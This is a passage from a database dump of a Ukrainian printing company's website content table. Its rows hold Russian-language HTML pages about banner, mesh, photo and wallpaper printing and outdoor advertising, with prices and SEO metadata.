border=\"0\" width=\"600\" height=\"362\" style=\"border: 0pt none;\" /><br /><br />Креативная реклама фильма Послезавтра про глобальное потепление:<br /><img src=\"images/stories/kreativnaja-reklama/pechat-na-bannere-film.jpg\" border=\"0\" width=\"600\" height=\"389\" style=\"border: 0pt none;\" /></p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr style=\"text-align: center;\">\r\n<td>Реклама \"Тренажерного зала\"</td>\r\n<td>Рекламы Volkswagen - Хорошее должно быть небольшим.</td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/stories/kreativnaja-reklama/pechat-na-bannere-sport.jpg\" border=\"0\" width=\"290\" height=\"383\" style=\"border: 0pt none; float: left; margin-top: 5px; margin-bottom: 5px;\" /></td>\r\n<td><img src=\"images/stories/kreativnaja-reklama/pechat-na-bannere-Volkswage.jpg\" border=\"0\" width=\"290\" height=\"386\" style=\"margin-top: 5px; margin-bottom: 5px; border: 0pt none; float: right;\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Баннер печать в ЭкваторПринт</h3>\r\n<p>Мы гарантируем вам высокое качество наших услуг, поскольку наш опыт и наше оборудование соответствует наивысшим стандартам. Для печати мы используем фирменные оригинальные чернила на основе жесткого сольвента, что делает напечатанное изображение устойчивым к ультрафиолетовым лучам и механическому повреждению, таким образом печать не выгорает и остается яркой в течении многих лет.<br /> <strong><br /> </strong></p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #6699cc;\">\r\n<td style=\"height: 2px;\"></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" />\"ЭкваторПринт\" качественно и быстро выполнит:<br /><br />-   <a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">печать на   холсте</a> - оригинально украсьте свой интерьер<br /> - <a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">печать на виниле   (на пленке)</a> - современная яркая наружная реклама<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">печать   на сетке баннерной</a> - для рекламы на транспорте и фасадах<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной   рекламы\">изготовление наружной рекламы</a> - разные виды реклама на улицах и магазинах<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать   больших фотографий\">печать больших фотографий </a>- лучшему фото - достойный формат<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать на фотообоях\">печать на фотообоях</a>, сделайте помещение ярким и оригинальным<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\">печать флагов</a> - логотипы вышей фирмы, подарочные флаги, рекламные флаги<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать ситилайтов\">ситилайты</a>, реклама нацеленная на наиболее качественный зрительный контакт с потенциальными клиентами<br /><br />Мы предоставляем качественные материалы, стойкие чернила, быстрые сроки, высокий сервис! \"ЭкваторПринт\" - лучший центр для широкоформатной печати. Качество наших услуг останется на должном уровне долгий период времени.<br /></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-12-01 20:03:12',62,'','2015-11-03 07:58:01',62,0,'0000-00-00 00:00:00','2010-12-01 20:03:12','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',136,0,20,'баннер печать, печать баннера, печать на баннере','Широкоформатная печать на баннере - доставка по всей Украине. Быстрая печать. Большой выбор рулонных материалов для печати.',0,29248,'robots=\nauthor='),(9,'Печать на сетке','2010-12-01-20-08-59','','<table style=\"width: 600px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\">\r\n<h1>Печать на сетке баннерной</h1>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Полиграфия Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины</strong> в сроки <strong>1-3 дня.</strong></p>\r\n<p><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span></p>\r\n<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<colgroup><col width=\"309\"></col> <col width=\"171\"></col> <col width=\"87\"></col> <col span=\"2\" width=\"64\"></col> </colgroup> \r\n<tbody>\r\n<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n<td rowspan=\"2\" width=\"309\" height=\"60\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span></td>\r\n<td rowspan=\"2\" width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></span></td>\r\n<td rowspan=\"2\" width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Плотность(г/м2)</strong></span></span></td>\r\n<td colspan=\"2\" width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Стоимость(грн./м2)</strong></span></span></td>\r\n</tr>\r\n<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n<td width=\"64\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>до 10м?</strong></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>от   10</strong></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"40\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Сетка баннерная</span></span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">3.15</span></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">270</span></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\">100</span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\">87</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать:</strong></span></span></p>\r\n<p>Принимаем заказы по звонку или по e-mail.</p>\r\n<p> </p>\r\n<hr />\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/setka-big.jpg\" border=\"0\" alt=\"сетка баннерная\" title=\"сетка баннерная\" style=\"float: left; margin: 5px; border: 1px solid grey;\" />Сетка баннерная</strong> - облегченный вариант наружной рекламы. Сетка баннерная характеризуется полупрозрачными свойствами, поэтому зачастую устанавливается на фасадах с окнами. <br /><br />Также, сетка баннерная отлично походит для изготовления декораций заднего плана для театров и сцен.</p>\r\n<p style=\"text-align: justify;\">В городе <strong>Харьков</strong> <strong>сетка баннерная</strong> часто применяется для <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"Изготовление наружной рекламы\">изготовления наружной рекламы</a> на городском транспорте.</p>\r\n<p style=\"text-align: justify;\">В \"ЭкваторПринт\" <strong>печать на сетке</strong> баннерной осуществляется на материале высокого качества шириной 3,2 м.</p>\r\n<p style=\"text-align: justify;\">Заказав <a href=\"/\" title=\"широкоформатная печать Харьков\">широкоформатную печать</a> у нас, Вы получите качественную цветную печать, прочный материал и быстрые сроки выполнения заказа.</p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #6699cc;\">\r\n<td style=\"height: 2px;\"></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" />\"ЭкватрПринт\" предоставляет полный перечень услуг по широкоформатной печати:<br /><br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">печать на холсте</a> - стилизация под картину любого изображения<br /> - <a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">печать на виниле (на пленке)</a> - яркие цвета и высокая устойчивость к воздействиям внешней среды<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"изготовление баннера\">изготовление баннера</a> - эффективная реклама большого формата<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\">изготовление наружной рекламы</a> - все виды рекламы: реклама на улицах, магазинах, вывески, билборды и т.д.<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать больших фотографий\">печать больших фотографий </a>- достойному фото - заметный формат<br /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-family: verdana; font-size: x-small;\"><span style=\"font-family: verdana; font-size: x-small;\"> </span></span></p>','',1,0,0,0,'2010-12-01 20:08:35',62,'','2015-11-03 07:57:55',62,0,'0000-00-00 00:00:00','2010-12-01 20:08:35','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',54,0,19,'изготовление баннера, баннерная сетка, баннер печать харьков, баннер харьков, изготовление наружной рекламы Харьков','Изготовление баннера. Баннерная сетка - легкий и удобный материал для наружной рекламы на транспорте и на фасадах.',0,7475,'robots=\nauthor='),(10,'Печать больших фотографий','2010-12-01-20-51-52','','<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\">\r\n<h1 style=\"text-align: center;\">Печать больших фотографий</h1>\r\n</td>\r\n</tr>\r\n<tr valign=\"middle\">\r\n<td style=\"text-align: justify;\">\r\n<p>У вас есть любимая вами фотография? Так почему бы вам не распечатать ее в   большом размере и не поставить в рамочку на видное место?</p>\r\n<p>Печать фотографий больших размеров для интерьера можно выполнить на холсте.</p>\r\n</td>\r\n<td>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/bolwoe-foto.jpg\" border=\"0\" width=\"200\" style=\"margin: 0px; border: 0pt none;\" /></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr valign=\"middle\">\r\n<td><img src=\"images/stories/vistavka.jpg\" border=\"0\" width=\"200\" style=\"margin: 5px; float: left; border: 1px solid grey;\" /></td>\r\n<td style=\"text-align: justify;\">\r\n<p>А может Вы талантливый фотограф и у вас много прекрасных фото? - Тогда   обязательно возьмите себе на заметку - <a href=\"/\" title=\"широкоформатная печать Харьков\"><strong>широкоформатная печать</strong></a> в   <strong>ЭкваторПринт</strong> - это высокое качество на современном оборудовании.</p>\r\n<p><strong>Печать   больших фотографий</strong> в ЭкваторПринт - это и отличный способ сделать   подарок знакомым, и метод дизайна интерьера, а еще лучше и грандиозней -   выбрать самые удачные снимки, осуществить <strong>печать больших фотографий</strong> и   сделать свою выставку.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"background-color: #6699cc;\">\r\n<td style=\"height: 2px;\"></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" />Перечень всех услуг широкоформатной печати в \"ЭкваторПринт\":<br /><br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">печать на виниле (на пленке)</a> - отлично подходит для наружно йрекламы<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"изготовление баннера\">изготовление баннера</a> - материал высокой прочности<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">печать на сетке баннерной</a> - идеальный вариант для рекламы на фасадах с окнами<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\">изготовление наружной рекламы</a> - (реклама на улицах, магазинах, вывески, билборды и т.д.)<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">печать на холсте</a> - украсьте свой интерьер шикарным полотном<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать фотообоев\">печать фотообоев</a> - уникальный дизайн вашего дома<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\" title=\"печать флагов\">печать флагов</a>, прославьте свой бренд<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать ситилайтов\">печать ситилайтов</a>, нуружная реклама на уровне взгляда прохожих</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-12-01 20:43:50',62,'','2014-06-17 14:53:35',62,62,'2014-08-27 10:36:42','2010-12-01 20:43:50','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',27,0,18,'печать больших фотографий, печать фотографий больших форматов','Широкоформатная печать больших фотографий. Цветная печать высокого качества. Печать фотографий осуществляется на современном оборудовании.',0,21040,'robots=\nauthor='),(11,'Изготовление наружной рекламы','2010-12-06-15-15-58','','<table style=\"width: 600px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1 style=\"text-align: center;\">Изготовление наружной рекламы</h1>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/narugnaja-kreativ-reklama.jpg\" border=\"0\" style=\"float: left; margin: 5px 10px; border: 1px solid grey;\" /></p>\r\n<p style=\"text-align: justify;\"><strong>Наружная реклама</strong> встречается нам повсюду - на улицах и на проспектах, на витринах магазинов и у прилавков, внутри помещений, в офисах, на выставках. <br /><span style=\"color: #0000ff;\"><strong>Без наружной рекламы современному бизнесу никуда!</strong></span></p>\r\n<p style=\"text-align: justify;\"><strong>Наружная реклама</strong> как <strong>в Харькове</strong> так и в других городах, это<strong> </strong>раскручивание бренда, реклама товара, а также авторитет среди потенциальных клиентов. Помимо этого, <strong>изготовление наружной рекламы</strong> для вашего офиса, магазина, сделает вас заметными среди однотипных построек такого большого города, как Харьков.</p>\r\n<table style=\"width: 600px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p style=\"text-align: justify;\">Отметим, что <strong>изготовление наружной рекламы</strong> на  стены здания, в котором находится ваш офис, \"убивает одним выстрелом двух зайцев\".  Такая наружная реклама не только прославит ваш товар/услугу, но и станет хорошим ориентиром для клиентов.</p>\r\n</td>\r\n<td><img src=\"images/stories/eko.jpg\" border=\"0\" width=\"120\" style=\"float: right; border: 1px solid grey; margin-left: 5px; margin-right: 5px;\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Изготовление наружной рекламы от <span style=\"color: #0000ff;\">Экватор</span><span style=\"color: #0000ff;\">Принт</span> это:</h4>\r\n- <a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"изготовление баннера\">изготовление баннера</a><br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12#изготовление вывесок\" title=\"изготовление вывесок\">изготовление вывесок</a><br />- реклама на билбордах<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"сити лайты Харьков\">реклама на сити лайтах</a><br />- реклама на магазинах<br />- реклама на улицах\r\n<p>Предоставляем качественные материалы для печати. Гарантируем яркие цвета и устойчивость к влияниям внешней среды.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h4 style=\"text-align: left;\"><span style=\"color: #0000ff;\">Когда началось изготовление наружной рекламы</span></h4>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/narugnaja-reklama-stqrina.jpg\" border=\"0\" alt=\"наружная реклама\" title=\"наружная реклама\" width=\"200\" style=\"margin: 5px; float: left; border: 1px solid grey;\" /> <strong>Изготовление наружной рекламы</strong> – самое первое и самое давнее проявление рекламной деятельности. Наружная реклама появилась вскоре после возникновения письменности. <br /> <br /> С давних времен и по сей день наружная реклама держит пик популярности и наверное, никогда его не покинет. В наше время, наружная реклама остается одним из наиболее эффективных промо-инструментов. <br /> <br /></p>\r\n<p style=\"text-align: justify;\">До 70х годов прошлого века <strong>изготовление наружной рекламы</strong> выполнялось вручную. Рекламные тексты и изображения наносилась на каменные стены, на деревянные или металлические плоскости.</p>\r\n<p style=\"text-align: justify;\">Сегодня же <strong>изготовление наружной рекламы</strong> – высокотехнологический автоматизированный процесс. Компьютерные системы позволили сделать прорыв в процессе изготовления наружной рекламы. Цифровая печать позволяет получать яркие и красочные изображения в кратчайшие сроки.</p>\r\n<p style=\"text-align: justify;\">В <strong>Харьков</strong>е и в Украине изготовление наружной рекламы в качестве широкоформатной печати стало особенно популярно с середины 90х годов. В то время стали широко применяться рекламные щиты, баннеры, растяжки.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<h4 style=\"text-align: left;\"><span style=\"color: #0000ff;\">Изготовление эффективной наружной рекламы. Рекомендации.</span></h4>\r\n<p style=\"text-align: justify;\"><strong> </strong><img src=\"images/stories/narugnaja-reklama-effekt.jpg\" border=\"0\" width=\"200\" style=\"margin: 5px; float: left; border: 1px solid grey;\" />Приведем несколько рекомендаций, которые помогут изготовить эффективную наружную рекламу.<strong> </strong></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #333333;\">Яркость.</span></strong> Наружная реклама не признает тонкостей и серости, она должна бросаться в глаза в первую же секунду, запоминаться легко и надолго, впечатлять прохожих своим дизайном, размерами и четкостью.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Все гениальное - просто.</strong> </span>При изготовлении наружной рекламы следует исключить с плакатов, баннеров, вывесок двузначные слова и непонятные сложные рисунки. Наружная реклама – это мимолетный объект внимания, всего лишь на несколько секунд. Поэтому, изготовление наружной рекламы должно соответствовать следующему оформлению: одна картинка и рекламный текст, длинной не более 7 слов.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Реклама с \"именем\".</strong></span><strong> </strong>По возможности персонифицируйте свою наружную рекламу.  Это будет практично. Изготавливая наружную рекламу, введите в текст название города или имя ближайшего дилера.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Вызовите эмоцию.</strong></span> Наружная реклама с эмоциональным контекстом запомнится зрителям намного дольше обычной пресной рекламы. И даже для уставших и голодных прохожих ваша наружная реклама может стать развлечением и вызвать улыбку.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Используйте цвет.</strong></span> Доказано, что наиболее легким и приятным для чтения является черный текст на желтом фоне. Изготовление рекламы может быть выполнено и в другой цветовой комбинации, самое главное придерживаться основных цветов и никогда не использовать светлые оттенки на желтом фоне.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>География наружной рекламы. </strong></span>Не упускайте возможность наружной рекламы указывать на ваше место расположения. Предполагая разместить рекламу неподалеку от вашего офиса, добавьте надпись \"мы за поворотом\" и т.п., поставьте указательную стрелочку, обозначьте расстояние. Также в изготовление наружной рекламы можно включить этнические особенности предполагаемой аудитории.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<h4><a name=\"изготовление вывесок\"></a><span style=\"color: #0000ff;\">Изготовление вывесок</span></h4>\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/viveska.jpg\" border=\"0\" width=\"200\" style=\"margin: 5px; border: 1px solid grey; float: left;\" />Изготовление вывесок</strong> помогает в формировании имиджа компании. Так, изготовление ярких и эпатажных вывесок для ресторанов и салонов красоты, привлекает внимание всех проходящих мимо. А изготовление стильных и строгих вывесок для бизнеса, не только привлекает внимание , но и задет стиль и имидж компании.<br /> <br /> <strong>Изготовление вывесок</strong> в ЭкваторПринт – налаженный процесс не требующий много времени. Как только вы закажите изготовление вывески и пришлете свои эскизы – мы тот час же запустим вывеску в печать.<br /> <br /> А вот продумывать дизайн вывески – задача не из легких. К этому вопросу следует подойти серьезно. Вывеска компании должна быть запоминающейся. Особенно важно чтобы вывеска подчеркивала вашу индивидуальность и была связанной с видом вашей деятельности.<br /> <br /> Ныне <strong>изготовление вывесок в Харькове</strong> имеет несколько вариантов. Вы можете заказать изготовление вывески на рулонных материалах (баннер, сетка, самоклейка) или же изготовить вывески  в виде объемных букв и с подсветками.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p> </p>\r\n<p>Интересно о:</p>\r\n<p>- <a href=\"index.php?option=com_content&amp;view=article&amp;id=12&amp;Itemid=13\" title=\"цифровая печать Харьков\">Что такое цифровая печать</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2010-12-06 15:15:33',62,'','2013-12-26 15:56:09',62,62,'2014-08-27 10:36:33','2010-12-06 15:15:33','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',54,0,17,'Изготовление наружной рекламы, изготовление баннера, изготовление вывесок, реклама на улицах, реклама на магазинах, реклама на билбордах, изготовление рекламы, наружная реклама харьков','Изготовление наружной рекламы: баннера, вывесок, реклама на улицах, на магазинах, на билбордах. материалы для рекламы и цветная цифровая печать.',0,10901,'robots=\nauthor='),(12,'Цифровая печать','digital-printing','','<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1 style=\"text-align: center;\">Что такое цифровая печать</h1>\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/cifrovaja.jpg\" border=\"0\" style=\"float: left; margin: 5px; border: 1px solid grey;\" />Цифровая печать</strong> <strong>Харьков</strong> на сегодняшний день наиболее популярна в полиграфии среди современных  методов печати. Цифровая печать позволяет печатать плакаты  непосредственно с компьютера и не требует никаких дополнительных  процессов допечатной подготовки. А это, в свою очередь, существенно  экономит время, затрачиваемое на изготовление печатной продукции.</p>\r\n<p style=\"text-align: justify;\"><strong>Цифровая печать</strong> представляет собой процесс получения оттисков при помощи использования  меняющейся формы печати. За изменения параметров цифровой печати в  устройстве управляет компьютер, соединенные с принтером. Цифровая печать  тиражей не большого объема очень выгодна и рентабельна. Выгода данной  цифровой печати кроется в возможности экономить на предпечатных  дорогостоящих процедурах. И при этом, стоимость цифровой печати в  Харькове не зависит от количества печатаемых экземпляров.</p>\r\n<p style=\"text-align: justify;\"><strong>В Харькове цифровая печать</strong> позволяет изготавливать малые объемы полиграфической продукции и  предоставлять клиентам большой перечень печатных услуг (<a href=\"index.php?option=com_content&amp;view=article&amp;id=8&amp;Itemid=9\" title=\"изготовление баннера\">изготовление  баннера</a>, <a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">печать на виниле</a>, <a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">печать на холсте</a>, <a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"сетка баннерная\">печать на сетке баннерной</a>, <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной рекламы\">изготовление наружной рекламы</a>).  В Харькове и в других развитых городах и странах, <a href=\"/\" title=\"широкоформатная печать\">широкоформатная  печать</a> является одной из важнейших областей, где применяется цифровая  печать.</p>\r\n<p style=\"text-align: justify;\">Качество  цифровой печати не ниже офсетной печати,  и  вдобавок, цифровая печать  позволяет персонификацировать отпечатки, оперативно менять текст или  изображения печатаемой продукции. Основной плюс в том. Что цифровая  печать значительно снижает не только стоимость предпечатной подготовки  (нет надобности изготавливать печатные формы и пленки), но также и риск  потерять качество на стадиях выполнения печати. Цифровая печать, в  качестве основы, позволяет использовать любой вид носителя: бумага,  самоклейка, сетка…</p>\r\n<p style=\"text-align: justify;\"><strong>Харьков</strong> широко применяет цифровую печать малотиражной рекламной продукции.  Внесение изменений в процессе цифровой печати возможно на любой стадии.</p>\r\n<h4 style=\"text-align: justify;\"><img src=\"images/stories/kraski.jpg\" border=\"0\" width=\"50\" style=\"vertical-align: middle; border: 0pt none; margin-left: 5px; margin-right: 5px;\" />Подытожим достоинства цифровой печати:</h4>\r\n<p style=\"text-align: justify;\">1. <strong>Цифровая печать</strong> позволяет предварительно просматривать вариант печати, также, перед  самим процессом печати, можно распечатать пробный вариант будущей  продукции. Такие возможности помогают наглядно оценивать дизайн рисунка и  качество печати, а следовательно можно своевременно вносить изменения</p>\r\n<p style=\"text-align: justify;\">2. <strong>Цифровая печать</strong> не требует допечатная подготовки, изготовления форм и пленок. Исходя из  этого, сам процесс печати обходится не дорого и без риска потери  качества.</p>\r\n<p style=\"text-align: justify;\">3. Продукция <strong>цифровой печати</strong> заметна своим высоким качеством изображения. Качество цифровой печати  становится особо заметно при печати профессиональных фотографий с  натуральными объектами и произведений искусства.</p>\r\n<p style=\"text-align: justify;\">4.<strong> Цифровая печать</strong>, в отличии от офсетной, делает возможным вносить изменения в параметры печати после каждого печатного процесса.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2011-01-14 14:33:58',62,'','2015-02-24 07:15:54',62,0,'0000-00-00 00:00:00','2011-01-14 14:33:58','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',14,0,16,'цифровая печать, цифровая печать Харьков, цифровая печать в Харькове','Цифровая печать в Харькове - одна из самых востребованных услуг полиграфии. Цифровая печать имеет массу достоинств.',0,3407,'robots=\nauthor='),(13,'Печать фотообоев','2011-04-21-16-26-32','','<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: justify;\">\r\n<h1 style=\"text-align: center;\">Печать фотообоев</h1>\r\n<p>Полиграфия Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины</strong> в сроки <strong>1-3 дня.</strong></p>\r\n<p><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span></p>\r\n<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<colgroup><col width=\"309\"></col> <col width=\"171\"></col> <col width=\"87\"></col> <col width=\"64\"></col> </colgroup> \r\n<tbody>\r\n<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n<td rowspan=\"2\" width=\"480\" height=\"60\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span></td>\r\n<td rowspan=\"2\" width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></span></td>\r\n<td colspan=\"2\" width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Стоимость(грн./м2)</strong></span></span></td>\r\n</tr>\r\n<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n<td width=\"64\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>до 10м?</strong></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>от   10</strong></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"40\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Фотообои</span></span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">1.24</span></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">259</span></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">235</span></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: 